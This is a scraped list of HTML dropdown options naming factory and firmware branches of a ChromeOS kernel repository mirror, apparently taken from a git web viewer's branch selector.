-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/cros/heads/chromeos-cpufreq_interactive-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/cros/heads/chromeos-cpufreq_interactive-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/experimental-baytrail-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/experimental-baytrail-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-1020.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-1020.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-1235.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-1235.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-1284.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-1284.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-1412.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-1412.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-1987.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-1987.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-2268.16.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-2268.16.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-2305.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-2305.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-2338.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-2338.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-2368.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-2368.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-2394.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-2394.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-2460.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-2460.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-2475.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-2475.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-2569.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-2569.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-2717.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-2717.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-2723.14.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-2723.14.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-2846.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-2846.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-2848.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-2848.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-2914.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-2914.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-2985.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-2985.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-2993.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-2993.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-3004.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-3004.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-3536.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-3536.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-4128.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-4128.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-4290.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-4290.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-4455.228.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-4455.228.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-4455.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-4455.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-980.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-980.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-arkham-7077.113.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-arkham-7077.113.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-auron-6459.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-auron-6459.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-beltino-5140.14.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-beltino-5140.14.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-beltino-5140.14.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-beltino-5140.14.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-daisy-4731.81.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-daisy-4731.81.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-monroe-5140.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-monroe-5140.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-monroe-5140.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-monroe-5140.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-nyan-5772.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-nyan-5772.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-nyan-5772.B-chromeos-3.10-16May14'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-nyan-5772.B-chromeos-3.10-16May14</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-nyan-5772.B-chromeos-3.10-Orig'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-nyan-5772.B-chromeos-3.10-Orig</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-nyan-5772.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-nyan-5772.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-nyan-5772.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-nyan-5772.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-oak-8141.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-oak-8141.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-oak-8182.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-oak-8182.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-panther-4920.1.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-panther-4920.1.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-panther-4920.23.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-panther-4920.23.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-pather-4920.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-pather-4920.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-pit-4280.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-pit-4280.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-pit-4390-old.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-pit-4390-old.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-pit-4390.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-pit-4390.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-pit-4471-dvt-old.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-pit-4471-dvt-old.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-pit-4471-old.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-pit-4471-old.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-pit-4471-pvt-old.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-pit-4471-pvt-old.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-pit-4471-pvt2.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-pit-4471-pvt2.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-pit-4471.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-pit-4471.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-pit-5499-EVT.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-pit-5499-EVT.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-pit-5499.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-pit-5499.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-pit-5499.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-pit-5499.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-rambi-5517.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-rambi-5517.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-rambi-5517.B-chromeos-3.10-EVT'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-rambi-5517.B-chromeos-3.10-EVT</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-rambi-5517.B-chromeos-3.10-original'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-rambi-5517.B-chromeos-3.10-original</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-rambi-5517.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-rambi-5517.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-rambi-6420.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-rambi-6420.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-ryu-6212.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-ryu-6212.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-ryu-6486.1.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-ryu-6486.1.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-ryu-6486.14.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-ryu-6486.14.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-ryu-6486.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-ryu-6486.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-samus-4788.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-samus-4788.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-samus-5939.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-samus-5939.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-samus-6207.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-samus-6207.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-samus-6375.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-samus-6375.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-skate-4262.459.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-skate-4262.459.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-smaug-7265.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-smaug-7265.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-spring-3842.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-spring-3842.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-spring-4131.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-spring-4131.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-spring-4262.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-spring-4262.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-storm-6269.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-storm-6269.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-test-7077.114.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-test-7077.114.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-whirlwind-6509.B'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-whirlwind-6509.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-zako-5216.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-zako-5216.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-zako-5216.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-zako-5216.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-zako-5220.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-zako-5220.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/factory-zako-5220.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/factory-zako-5220.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-4389.71.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-4389.71.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-881-u-boot-v1'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-881-u-boot-v1</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-auron-6301.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-auron-6301.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-banjo-5216.334.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-banjo-5216.334.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-banjo-5216.334.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-banjo-5216.334.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-bolt_kirby-4979.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-bolt_kirby-4979.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-buddy-6301.202.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-buddy-6301.202.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-butterfly-2788.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-butterfly-2788.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-candy-5216.310.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-candy-5216.310.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-candy-5216.310.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-candy-5216.310.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-celes-7287.92.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-celes-7287.92.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-clapper-5216.199.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-clapper-5216.199.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-clapper-5216.199.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-clapper-5216.199.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-clapper-5216.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-clapper-5216.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-clapper-5216.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-clapper-5216.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-clapper-5218.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-clapper-5218.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-clapper-5218.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-clapper-5218.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-cyan-7287.57.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-cyan-7287.57.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-edgar-7287.167.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-edgar-7287.167.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-enguarde-5216.201.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-enguarde-5216.201.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-enguarde-5216.201.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-enguarde-5216.201.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-expresso-5216.223.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-expresso-5216.223.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-expresso-5216.223.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-expresso-5216.223.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-falco_peppy-4389.81.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-falco_peppy-4389.81.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-falco_peppy-4389.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-falco_peppy-4389.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-gandof-6301.155.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-gandof-6301.155.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-glimmer-5216.198.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-glimmer-5216.198.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-glimmer-5216.198.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-glimmer-5216.198.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-glimmer-5216.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-glimmer-5216.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-glimmer-5216.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-glimmer-5216.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-glimmer-5217.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-glimmer-5217.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-glimmer-5217.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-glimmer-5217.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-gnawty-5216.239.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-gnawty-5216.239.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-gnawty-5216.239.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-gnawty-5216.239.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-guado-6301.108.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-guado-6301.108.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-heli-5216.392.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-heli-5216.392.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-heli-5216.392.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-heli-5216.392.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-kiev-2.112.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-kiev-2.112.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-kip-5216.227.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-kip-5216.227.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-kip-5216.227.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-kip-5216.227.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-kitty-5771.61.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-kitty-5771.61.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-kitty-5771.61.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-kitty-5771.61.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-kitty-5771.61.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-kitty-5771.61.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-leon-4389.26.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-leon-4389.26.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-leon-4389.61.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-leon-4389.61.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-link-2348.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-link-2348.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-link-2695.2.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-link-2695.2.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-link-2695.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-link-2695.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-lucid-8173.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-lucid-8173.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-lulu-6301.136.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-lulu-6301.136.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-mccloud-5827.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-mccloud-5827.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-mccloud-5827.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-mccloud-5827.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-mccloud-5827.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-mccloud-5827.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-monroe-4921.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-monroe-4921.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-ninja-5216.383.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-ninja-5216.383.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-ninja-5216.383.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-ninja-5216.383.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-nyan-5771.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-nyan-5771.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-nyan-5771.B-chromeos-3.14-experiment'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-nyan-5771.B-chromeos-3.14-experiment</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-nyan-5771.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-nyan-5771.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-orco-5216.362.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-orco-5216.362.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-orco-5216.362.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-orco-5216.362.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-paine-6301.58.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-paine-6301.58.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-panther-4920.24.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-panther-4920.24.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-panther-4920.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-panther-4920.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-parrot-2685.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-parrot-2685.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-pit-4482.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-pit-4482.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-quawks-5216.204.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-quawks-5216.204.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-quawks-5216.204.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-quawks-5216.204.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-rambi-5216.B-chromeos-3.10'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-rambi-5216.B-chromeos-3.10</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-rambi-5216.B-chromeos-3.8'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-rambi-5216.B-chromeos-3.8</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-reks-7287.133.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-reks-7287.133.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-rikku-6301.110.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-rikku-6301.110.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-samus-6300.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-samus-6300.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-skate-3824.129.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-skate-3824.129.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-smaug-7132.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-smaug-7132.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-smaug-7900.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-smaug-7900.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-snow-2695.90.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-snow-2695.90.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-snow-2695.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-snow-2695.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-spring-3824.4.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-spring-3824.4.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-spring-3824.55.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-spring-3824.55.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-spring-3824.84.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-spring-3824.84.B</option>
-<option value='caf/3.10/caf/chromium-googlesource-kernel-next/firmware-spring-3824.B'>caf/3.10/caf/chromium-googlesource-kernel-next/firmware-spring-3824.B</option>
